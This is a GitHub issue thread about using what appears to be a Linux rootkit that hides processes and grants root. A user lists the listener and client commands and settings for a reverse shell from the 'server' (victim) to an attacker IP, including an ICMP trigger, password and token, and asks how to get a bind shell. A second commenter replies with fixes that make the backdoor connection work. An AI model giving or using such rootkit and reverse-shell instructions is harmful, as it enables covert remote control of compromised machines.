Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

i want about detali usage. #90

Open
JUNGJUNCHUL opened this issue Jun 4, 2020 · 1 comment
Open

i want about detali usage. #90

JUNGJUNCHUL opened this issue Jun 4, 2020 · 1 comment

Comments

@JUNGJUNCHUL
Copy link

hello. i finally install all!!!
I am not good at English, so please understand it.

I test in kali-64bit-amd and it work perfect at hiding a process and get a root.
but how i can get a bind shell???

attacker ip : 192.168.21.129
server ip : 192.168.21.130

--------------------reverse shell----------------------------------------------------
attacker shell : ./listener -p 4444 -s s3cr3t

server shell : ./client
set LHOST 192.168.129
set LPORT 4444
set SRCHOST 192.168.22.2
set SRCPORT 11
set RHOST 192.168.21.130
set RPORT 4445
set PORT ICMP
set PASS s3cr3t
set TOKEN hax0r

    and type!! run ! 

** it perfectly run well but in the wireshark show TCP 4444 not a ICMP **

------------------bind shell----------------
how i can get a bind shell???
server shell : ./listener -p 3333 -s s3cr3t

attackershell : There is no response even when you type the command.


summary

  1. "revershell not work icmp backdoor" it shows tcp
  2. how i use bind shell???
  3. is there any wiki??? about this issue??

thank you for reading.
i wait your reply.

@LevitatingBusinessMan
Copy link

Use TCP as protocol instead of ICMP.
No need to run the listener program on the victim machine if you got the module loaded.
Make SRCHOST be the same as LHOST

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants